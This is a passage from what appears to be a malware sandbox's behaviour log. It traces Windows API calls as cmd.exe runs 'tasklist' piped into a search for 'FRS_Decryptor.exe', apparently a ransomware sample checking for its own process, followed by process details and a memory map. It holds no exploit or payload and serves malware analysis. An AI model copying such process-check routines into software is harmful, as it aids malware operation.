lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.574] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.574] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0x635628 [0127.574] FindClose (in: hFindFile=0x635628 | out: hFindFile=0x635628) returned 1 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0x635628 [0127.575] FindClose (in: hFindFile=0x635628 | out: hFindFile=0x635628) returned 1 [0127.575] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.575] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.575] GetConsoleTitleW (in: lpConsoleTitle=0x4ff454, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0127.575] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff380, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff364 | out: lpAttributeList=0x4ff380, lpSize=0x4ff364) returned 1 [0127.575] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff380, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff36c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff380, lpPreviousValue=0x0) returned 1 [0127.575] GetStartupInfoW (in: lpStartupInfo=0x4ff3b8 | out: lpStartupInfo=0x4ff3b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.575] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.576] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.576] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.577] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x4ff308*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff354 | out: lpCommandLine="tasklist", lpProcessInformation=0x4ff354*(hProcess=0x64, hThread=0x60, dwProcessId=0x784, dwThreadId=0x2e4)) returned 1 [0127.580] CloseHandle (hObject=0x60) returned 1 [0127.580] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.580] GetEnvironmentStringsW () returned 0x6342d8* [0127.580] FreeEnvironmentStringsA (penv="=") returned 1 [0127.580] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff380 | out: lpAttributeList=0x4ff380) [0127.580] _get_osfhandle (_FileHandle=3) returned 0x54 [0127.580] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0127.580] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0127.580] _close (_FileHandle=5) returned 0 [0127.581] _dup (_FileHandle=0) returned 4 [0127.581] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0127.581] _close (_FileHandle=3) returned 0 [0127.581] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0127.581] SetErrorMode (uMode=0x0) returned 0x0 [0127.581] SetErrorMode (uMode=0x1) returned 0x0 [0127.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6342e0, lpFilePart=0x4ff424 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff424*="Desktop") returned 0x1c [0127.581] SetErrorMode (uMode=0x0) returned 0x1 [0127.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.581] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.581] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0xffffffff [0127.581] GetLastError () returned 0x2 [0127.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0x635628 [0127.582] FindClose (in: hFindFile=0x635628 | out: hFindFile=0x635628) returned 1 [0127.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0xffffffff [0127.582] GetLastError () returned 0x2 [0127.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff1b0) returned 0x635628 [0127.582] FindClose (in: hFindFile=0x635628 | out: hFindFile=0x635628) returned 1 [0127.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.582] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0127.582] SetErrorMode (uMode=0x0) returned 0x0 [0127.582] SetErrorMode (uMode=0x1) returned 0x0 [0127.582] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x634668, lpFilePart=0x4ff1cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff1cc*="Desktop") returned 0x1c [0127.582] SetErrorMode (uMode=0x0) returned 0x1 [0127.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.582] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0xffffffff [0127.583] GetLastError () returned 0x2 [0127.583] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.583] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0x6304a0 [0127.583] FindClose (in: hFindFile=0x6304a0 | out: hFindFile=0x6304a0) returned 1 [0127.583] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0xffffffff [0127.583] GetLastError () returned 0x2 [0127.583] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x4fef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4fef58) returned 0x6304a0 [0127.583] FindClose (in: hFindFile=0x6304a0 | out: hFindFile=0x6304a0) returned 1 [0127.583] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.583] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.583] GetConsoleTitleW (in: lpConsoleTitle=0x4ff454, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0127.584] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff380, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff364 | out: lpAttributeList=0x4ff380, lpSize=0x4ff364) returned 1 [0127.584] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff380, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff36c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff380, lpPreviousValue=0x0) returned 1 [0127.584] GetStartupInfoW (in: lpStartupInfo=0x4ff3b8 | out: lpStartupInfo=0x4ff3b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.584] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.585] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.585] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x4ff308*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff354 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x4ff354*(hProcess=0x60, hThread=0x54, dwProcessId=0x688, dwThreadId=0x658)) returned 1 [0127.587] CloseHandle (hObject=0x54) returned 1 [0127.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.587] GetEnvironmentStringsW () returned 0x63ad78* [0127.587] FreeEnvironmentStringsA (penv="=") returned 1 [0127.587] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff380 | out: lpAttributeList=0x4ff380) [0127.587] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0127.587] _close (_FileHandle=4) returned 0 [0127.587] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0128.053] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x4ff6c8 | out: lpExitCode=0x4ff6c8*=0x0) returned 1 [0128.053] CloseHandle (hObject=0x64) returned 1 [0128.053] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0128.055] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x4ff6c8 | out: lpExitCode=0x4ff6c8*=0x0) returned 1 [0128.055] CloseHandle (hObject=0x60) returned 1 [0128.055] _get_osfhandle (_FileHandle=1) returned 0x260 [0128.055] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0128.055] _get_osfhandle (_FileHandle=1) returned 0x260 [0128.055] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0128.055] _get_osfhandle (_FileHandle=0) returned 0x24 [0128.055] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0128.055] SetConsoleInputExeNameW () returned 0x1 [0128.055] GetConsoleOutputCP () returned 0x1b5 [0128.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0128.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.055] exit (_Code=0) Process: id = "136" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x19632000" os_pid = "0x784" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0x74c" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7019 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7020 start_va = 0x560000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 7021 start_va = 0x580000 end_va = 0x581fff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7022 start_va = 0x590000 end_va = 0x59efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7023 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 7024 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7025 start_va = 0x620000 end_va = 0x623fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 7026 start_va = 0x630000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 7027 start_va = 0x640000 end_va = 0x641fff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 7028 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7029 start_va = 0x7edc0000 end_va = 0x7ede2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edc0000" filename = "" Region: id = 7030 start_va = 0x7edeb000 end_va = 0x7ededfff entry_point = 0x0 region_type = private name = "private_0x000000007edeb000" filename = "" Region: id = 7031 start_va = 0x7edee000 end_va = 0x7edeefff entry_point = 0x0 region_type = private name = "private_0x000000007edee000" filename = "" Region: id = 7032 start_va = 0x7edef000 end_va = 0x7edeffff entry_point = 0x0 region_type = private name = "private_0x000000007edef000" filename = "" Region: id = 7033 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7034 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7035 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7036 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7056 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7057 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7058 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7059 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7064 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 7065 start_va = 0x570000 end_va = 0x573fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 7066 start_va = 0x580000 end_va = 0x582fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7067 start_va = 0x650000 end_va = 0x6cdfff entry_point = 0x650000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7068 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 7069 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 7070 start_va = 0x6f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 7071 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 7072 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 7073 start_va = 0x730000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 7074 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = 